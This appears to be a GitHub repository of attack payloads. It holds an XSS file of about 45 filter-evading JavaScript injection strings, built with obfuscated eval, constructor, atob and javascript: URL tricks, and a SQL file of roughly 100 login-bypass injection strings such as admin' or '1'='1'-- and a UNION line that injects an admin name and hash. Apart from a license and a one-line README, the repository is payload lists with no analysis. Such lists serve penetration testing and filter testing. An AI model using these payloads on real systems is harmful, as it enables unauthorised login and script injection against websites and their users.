├── Awesome-XSS-Payloads ├── LICENSE ├── README.md └── sql-admin-bypass.txt /Awesome-XSS-Payloads: -------------------------------------------------------------------------------- 1 | Run in a JavaScript sandbox: http://www.webtoolkitonline.com/javascript-tester.html or https://jsfiddle.net 2 | One payload per line 3 | ------------------------------------------------------------------------------------------ 4 | 5 | [][`filter`][`constructor`](`ale`.concat(`rt\x28`.concat`0\x29`))();// 6 | eval('ale'+'rt(0)'); 7 | Function("ale"+"rt(1)")(); 8 | setTimeout('ale'+'rt(2)'); 9 | constructor.constructor("aler"+"t(3)")(); 10 | [].filter.constructor('ale'+'rt(4)')(); 11 | top["al"+"ert"](5); 12 | new Function`al\ert\`6\``; 13 | top[8680439..toString(30)](7); 14 | top[/al/.source+/ert/.source](8); 15 | top['al\x65rt'](9); 16 | setInterval('ale'+'rt(10)'); 17 | open('java'+'script:ale'+'rt(11)'); 18 | location='javascript:ale'+'rt(12)'; 19 | Set.constructor('ale'+'rt(13)')(); 20 | Set.constructor`al\x65rt\x2814\x29```; 21 | top[8680439..toString(30)](7); 22 | top[/al/.source+/ert/.source](8); 23 | top['al\x65rt'](9); 24 | setInterval('ale'+'rt(10)'); 25 | open('java'+'script:ale'+'rt(11)'); 26 | location='javascript:ale'+'rt(12)'; 27 | eval('ale'+'rt(0)'); 28 | Function("ale"+"rt(1)")(); 29 | setTimeout('ale'+'rt(2)'); 30 | constructor.constructor("aler"+"t(3)")(); 31 | [].filter.constructor('ale'+'rt(4)')(); 32 | top["al"+"ert"](5); 33 | new Function`al\ert\`6\``; 34 | </xmp><img src=x onerror=alert(1)> 35 | import('da\r\nta:text/\ecmascript\,alert%601%60') 36 | ?"> 37 | document.location=unescape("%19Jav%09asc%09ript:https ://foobar/%250Aconfirm%25281%2529") 38 | http://window.open ("http://tpc.googlesyndication.com/safeframe/1-0- …","1;25;true") 39 | atob.constructor(atob`YWxlcnQoMSk`)`` 40 | atob.constructor(atob(/YWxlcnQoMSk/.source))() 41 | window[Symbol.hasInstance]=eval 42 | atob`YWxlcnQoMSk` instanceof window 43 | 
location='http://\u{e01cc}\u{e01cd}\u{e01ce}\u{e01cf}\u{e01d0}\u{e01d1}\u{e01d2}\u{e01d3}\u{e01d4}\u{e01d5}google\u{e01da}\u{e01db}\u{e01dc}\u{e01dd}\u{e01de}\u{e01df}.com' 44 | document.write("al","ert(","1)","") 45 | eval(`${`${`${`${`${`a`}`}`}`}`}${`${`${`${`${`l`}`}`}`}`}${`${`${`${`${`e`}`}`}`}`}${`${`${`${`${`r`}`}`}`}`}${`${`${`${`${`t`}`}`}`}`}${`${`${`${`${`(1)`}`}`}`}`}`) 46 | ;[].constructor.prototype.join=function(){return'pwnd'};eval('alert(1)') 47 | import('data:text/javascript,alert(1)') 48 | 49 | this[Object["keys"](this)[146]](1) 50 | this[Object["keys"](this)[5]](1) 51 | &redir=javascript%3Aalert(1) 52 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 Akalanka Ekanayake 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | ## My Payload Collection (XSS, SQL, ...) 3 | -------------------------------------------------------------------------------- /sql-admin-bypass.txt: -------------------------------------------------------------------------------- 1 | ') or true-- 2 | ') or ('')=(' 3 | ') or 1-- 4 | ') or ('x')=(' 5 | " or true-- 6 | " or ""=" 7 | " or 1-- 8 | " or "x"=" 9 | ") or true-- 10 | ") or ("")=(" 11 | ") or 1-- 12 | ") or ("x")=(" 13 | ')) or true-- 14 | ')) or ((''))=((' 15 | ')) or 1-- 16 | ')) or (('x'))=((' 17 | '-' 18 | ' ' 19 | '&' 20 | '^' 21 | '*' 22 | ' or ''-' 23 | ' or '' ' 24 | ' or ''&' 25 | ' or ''^' 26 | ' or ''*' 27 | "-" 28 | " " 29 | "&" 30 | "^" 31 | "*" 32 | " or ""-" 33 | ' or ''=' 34 | or 1=1 35 | or 1=1-- 36 | or 1=1# 37 | or 1=1/* 38 | admin' -- 39 | admin' # 40 | admin'/* 41 | admin' or '1'='1 42 | admin' or '1'='1'-- 43 | admin' or '1'='1'# 44 | admin' or '1'='1'/* 45 | admin'or 1=1 or ''=' 46 | admin' or 1=1 47 | admin' or 1=1-- 48 | admin' or 1=1# 49 | admin' or 1=1/* 50 | admin') or ('1'='1 51 | admin') or ('1'='1'-- 52 | admin') or ('1'='1'# 53 | admin') or ('1'='1'/* 54 | admin') or '1'='1 55 | admin') or '1'='1'-- 56 | admin') or '1'='1'# 57 | admin') or '1'='1'/* 58 | 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 59 | admin" -- 60 | admin" # 61 | admin"/* 62 | admin" or "1"="1 63 | admin" or "1"="1"-- 64 | admin" or "1"="1"# 65 | admin" or "1"="1"/* 66 | admin"or 1=1 or ""=" 67 | admin" or 1=1 68 | admin" or 1=1-- 69 | admin" or 1=1# 70 | admin" or 1=1/* 71 | admin") or ("1"="1 72 | admin") or ("1"="1"-- 73 | admin") or ("1"="1"# 74 | admin") or ("1"="1"/* 75 | admin") or "1"="1 76 | admin") or "1"="1"-- 77 | admin") or "1"="1"# 78 | admin") or "1"="1"/* 79 | 1' or 1=1 -- - 80 | admin' or '2' LIKE '1 81 | admin' or 2 LIKE 2-- 82 | 
admin' or 2 LIKE 2# 83 | admin') or 2 LIKE 2# 84 | admin') or 2 LIKE 2-- 85 | admin') or ('2' LIKE '2 86 | admin') or ('2' LIKE '2'# 87 | admin') or ('2' LIKE '2'/* 88 | admin' or '1'='1 89 | admin' or '1'='1'-- 90 | admin' or '1'='1'# 91 | admin' or '1'='1'/* 92 | admin'or 1=1 or ''=' 93 | admin' or 1=1 94 | admin' or 1=1-- 95 | admin' or 1=1# 96 | admin' or 1=1/* 97 | admin') or ('1'='1 98 | admin') or ('1'='1'-- 99 | admin') or ('1'='1'# 100 | admin') or ('1'='1'/* 101 | admin') or '1'='1 102 | admin') or '1'='1'-- 103 | admin') or '1'='1'# 104 | admin') or '1'='1'/* 105 | --------------------------------------------------------------------------------